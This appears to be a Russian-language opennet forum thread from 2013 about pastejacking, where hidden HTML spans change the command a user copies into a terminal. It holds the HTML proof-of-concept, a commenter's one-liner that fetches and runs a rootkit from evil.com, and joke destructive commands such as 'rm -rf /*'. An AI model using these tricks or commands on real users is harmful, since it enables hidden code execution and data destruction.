URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 89497
[ Назад ]

Исходное сообщение
"Концепция атаки по подмене копируемого в терминал текста с с..."

Отправлено opennews , 08-Апр-13 10:12 
Опубликована (http://thejh.net/misc/website-terminal-copy-paste) интересная концепция тривиальной, но эффективной, атаки, рассчитанной на излишнее доверие к увиденных при копировании в терминал примеров команд с различных сайтов. Используя невидимый, но помещаемый в буфер обмена при копировании, блок "span", можно вместо невинного текста, организовать выполнение в терминале произвольных команд.

<style>
    .codeblock {
      display: inline-block;
      margin-left: 50px;
    }
  </style>


Например, после копирования в окно терминала строки "git clone <span style="position: absolute;  left: -100px; top: -100px">/dev/null; clear; echo "Hello"
git clone</span> git://git.kernel.org/pub/scm/utils/kup/kup.git" на самом деле будет выполнена команда "git clone /dev/null; clear; echo Hello" и отображён текст "git clone git://git.kernel.org/pub/scm/utils/kup/kup.git".

URL: http://www.reddit.com/r/netsec/comments/1bv359/dont_copypast.../
Новость: http://www.opennet.me/opennews/art.shtml?num=36619


Содержание

Сообщения в этом обсуждении
"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено zzzzz , 08-Апр-13 10:12 
вот это дырень О_О

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 11:02 
http://images.wikia.com/callofduty/ru/images/6/69/%D0&#...

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 14:03 
Не беда! Теперь вместо
выделить(что-то), копировать, вставить
>>

выделить(что-то), копировать, вставить,
+
выделить(только то, что действительно можно), вставить

ничетаковерхедпонадобитсяновыямышь


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено pavlinux , 08-Апр-13 15:06 
Похожий "эксплойт" был на заре WWW, когда народ понял, что можно писать текст цветом бэкграунда. :)

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено 80е , 08-Апр-13 20:41 
> Похожий "эксплойт" был на заре WWW, когда народ понял, что можно писать
> текст цветом бэкграунда. :)

И без зари, и без заката WWW я отродясь копирую текст сначала в самый тупой из редакторов, чтобы просмотреть его перед переносом в промпт.


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено pavlinux , 09-Апр-13 05:25 
> я отродясь копирую текст сначала в самый тупой из редакторов,
> чтобы просмотреть его перед переносом в промпт.

Да-да-да, конечно-конечно-конечно, мы тебе верим!


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 10:15 
Это скорее недоработка, чем дырень.
[сообщение отредактировано модератором]

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено 80е , 08-Апр-13 20:37 
>> Это скорее недоработка, чем дырень.

Вот именно


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Okarin , 08-Апр-13 10:24 
Да это просто 10 из 10! Ждем эпидемию вандализма в вики дистрибутивов!

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено MrClon , 09-Апр-13 00:40 
> Да это просто 10 из 10! Ждем эпидемию вандализма в вики дистрибутивов!

В вики это не сработает, в них как правило HTML юзать не дают, только свою разметку.


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 10:27 
спасибо за идею :)

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 10:33 
шикарно же, как это еще раньше не нашли?

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено 80е , 08-Апр-13 20:38 
> шикарно же, как это еще раньше не нашли?

ты больной? кто там этого «раньше не находил»???


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 10:40 
Видимо, следующее первое апреля будет на редкость удачным. :)
Ждем появления специальных тем для юзеров, словивших таким образом `rm -rf $HOME &'.

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 11:03 
А при чем тут HTML5? В указанной конструкции нет ни 1 элемента из HTML5 :)

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 11:18 
Ну, я про HTML5 и не писал. Да и насколько мне известно, среднестатистический shell пока что кроме bash/csh/ksh скриптов ничего другого не разумеет. Хотя, быть может, наступят те светлые времена, когда HTML-теги можно будет набивать прямо в терминале. А вместо bash будет JavaScript. :)

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 11:22 
В дополнение:
<rm path="$HOME" class="noecho"/>
Я джва года жду такой shell...

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено MrClon , 09-Апр-13 00:46 
> В дополнение:
> <rm path="$HOME" class="noecho"/>
> Я джва года жду такой shell...

class="noecho,force,recursive"


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено skybon , 08-Апр-13 11:17 
Ну много же всяких, которые тянут любое говно в ближайший терминал без оглядки.

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 11:40 
Ну так копировать сначала в текстовый редактор и смотреть, что вставилось. Лишнее убирать и только затем в терминал.

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено zzzzz , 08-Апр-13 13:20 
> Ну так копировать сначала в текстовый редактор и смотреть, что вставилось. Лишнее
> убирать и только затем в терминал.

хоть кто-то так делает? а сколько людей читают новостные сайты? да эта хрень просто бомба. единственный способ защиты - встроить во все терминалы проверку при вставке текста на наличие ";" и выдавать пользователю окошко с предупреждением.


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено GotF , 08-Апр-13 13:33 
> единственный способ защиты - встроить во все терминалы проверку при вставке текста на наличие ";" и выдавать пользователю окошко с предупреждением.

При чём тут ";"? Ловить надо перевод строки.


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 13:55 
По уму, надо бы просто чтобы невидимый текст никуда не копировался.

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено GotF , 08-Апр-13 14:20 
> По уму, надо бы просто чтобы невидимый текст никуда не копировался.

Ну как бы да, но беда в том, что в этих ваших интернетах есть 1001 способ сделать текст невидимым. В общем, всё как обычно сводится к прокладке между креслом и клавиатурой.


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено cmp , 08-Апр-13 14:03 
echo Hello && setsid sh -c 'wget -b -O /usr/bin http://evil.com/rootkit.sh && chmod 0755 /usr/bin/rootkit.sh && rootkit.sh' > /dev/null 2>&1 & clear && git clone git://kernel.org

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено GotF , 08-Апр-13 14:18 
> echo Hello && setsid sh -c 'wget -b -O /usr/bin http://evil.com/rootkit.sh &&
> chmod 0755 /usr/bin/rootkit.sh && rootkit.sh' > /dev/null 2>&1 & clear &&
> git clone git://kernel.org

Это всё чудесно, но без '\n' в нужном месте не выполнится :)


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено gegMOPO4 , 08-Апр-13 16:30 
Ещё \r.

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Слакварявод , 08-Апр-13 11:58 
В clipper-е в кедах видно сразу что там в буфер забилось! можно там глядеть, прежде чем вставлять!

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено 1235235412831 , 08-Апр-13 12:50 
Патч Брамина v.2.0 :D

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено GotF , 08-Апр-13 12:57 
> Патч Брамина v.2.0

Бармина.


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 13:58 
Теперь всё в блокнот копировать.. (

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено нимус , 08-Апр-13 14:06 
ну вот, спалили тему...

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено pavlinux , 08-Апр-13 14:17 
Ваще-то это дыра в браузерах - то, что копируются не выделенные символы, а хрень какая-то.

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Клыкастый , 08-Апр-13 14:25 
эта милая привычка браузеров выделять не то, что я вижу, а ещё всякую html разметку мне никогда не нравилась.

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Михрютка , 08-Апр-13 23:46 
> эта милая привычка браузеров выделять не то, что я вижу, а ещё
> всякую html разметку мне никогда не нравилась.

Сусли^WТекст за пределами окна ты тож не видишь. А он есть.


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Михрютка , 08-Апр-13 23:42 
в CSS

span style="position: absolute; left: -100px; top: -100px"

именно выделенные символы и копируются, все по чесноку.


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Клыкастый , 08-Апр-13 14:24 
"вставить как простой текст", энтер жать не сразу, не?

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено angra , 08-Апр-13 14:34 
В "простом тексте" уже могут быть переводы строки. Да и вычитывать большой блок вряд ли кто-то станет, особенно после вычитки его в браузере.

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Клыкастый , 08-Апр-13 14:39 
ну тогда - "ой!"

- вычитываем в vim-е.
- да и вообще копипастить отучаемся.

оригинальная "дырка" на самом деле. на 90% - social engineering.


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Stax , 08-Апр-13 20:57 
Гм. А вот если там последовательность <esc>:q!rm -rf /<enter> ? А вы в вим вставляете..

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Клыкастый , 08-Апр-13 21:45 
> Гм. А вот если там последовательность <esc>:q!rm -rf /<enter> ? А вы в вим вставляете..

уже лучше. и под десяток всего!



"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 15:22 
Не понимаю сути проблемы. В гну/линукс такой бардак что написать строчку которая заработает у других людей даже в том же дичтрибутиве очень сложно.
обычно просто нечего копипастить

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 17:03 
rm -rf /usr

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 17:17 
rm -rf /* && init 6

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Xasd , 08-Апр-13 22:08 

bash: init: command not found...


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 09-Апр-13 01:12 
reboot или shutdown -h now

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Xasd , 09-Апр-13 03:15 
$ reboot
bash: reboot: command not found...
$ shutdown -h now
bash: shutdown: command not found...

и даже так (!) :

$ bash
bash: bash: command not found...
$ ls /bin/ /usr/bin/
ls: cannot access /bin/: No such file or directory
ls: cannot access /usr/bin/: No such file or directory


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено pavlinux , 09-Апр-13 05:29 
>[оверквотинг удален]
> $ shutdown -h now
> bash: shutdown: command not found...
>

> и даже так (!) :
>
$ bash 
> bash: bash: command not found...
> $ ls /bin/ /usr/bin/
> ls: cannot access /bin/: No such file or directory
> ls: cannot access /usr/bin/: No such file or directory
>

echo b > /proc/sysrq-trigger


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Онононо , 08-Апр-13 17:15 
понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать на любой ОС где есть доступ к шелу.

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 18:02 
> понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать
> на любой ОС где есть доступ к шелу.

Пользователи винды не очень часто вставляют комманды с веб-сайтов в cmd.exe


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 18:25 
Для пользователей винды то ли на Баше, то ли ItHappens был описан Формат Улыбки:
Команда format C:, подтвердить, и после перезагрузки ваш компьютер будет работать гораздо быстрее

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Онононо , 08-Апр-13 18:35 
ты окромя винды больше осей не знаешь?

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 19:16 
> Пользователи винды не очень часто знают что такое cmd.exe

так правильно.


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 10-Апр-13 16:55 
>> Пользователи винды не очень часто знают что такое cmd.exe
> так правильно.

А должны?


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Aceler , 08-Апр-13 19:52 
Когда http://paypal.com/ на самом деле копируется как http://lskdjbsnd.tk/sdefj/sdf/?sdjhasdknb&dfsdf&go=http://pa..., при этом по второй ссылке тебе покажут логин пэйпала, а в адресной строке через Javascript будет стоять paypal.com — пользователи венды будут очень недовольны.

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Xasd , 09-Апр-13 03:33 
Firefox can't find the server at www.lskdjbsnd.tk.

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Харитон , 08-Апр-13 22:22 
>> понимаешь друг линукс тут вообще не при чем, эта "уязвимость" будет работать
>> на любой ОС где есть доступ к шелу.
> Пользователи винды не очень часто вставляют комманды с веб-сайтов в cmd.exe

как бы сказать  уних такой возможности даже нет...
вот павершеле...)))
там и возможности пошире...


"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 08-Апр-13 19:14 
Я про то почти никогда не имеет смысл что-то копипастить с сайтов.
В прочем url всегда копипастю так что... В общем как страшно жить.

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Xasd , 08-Апр-13 22:10 
 

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено mmrnmhrm , 08-Апр-13 20:29 
реквестирую буфер обмена с программируемой логикой

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Михрютка , 08-Апр-13 23:50 
постить на опеннете новости с угловыми скобками в тексте - идеальный метод троллинга аудитории.

"Концепция атаки по подмене копируемого в терминал текста с с..."
Отправлено Аноним , 09-Апр-13 13:15 
В urxvt есть плагин confirm-paste, требующий подтверждения при вставке многострочного текста.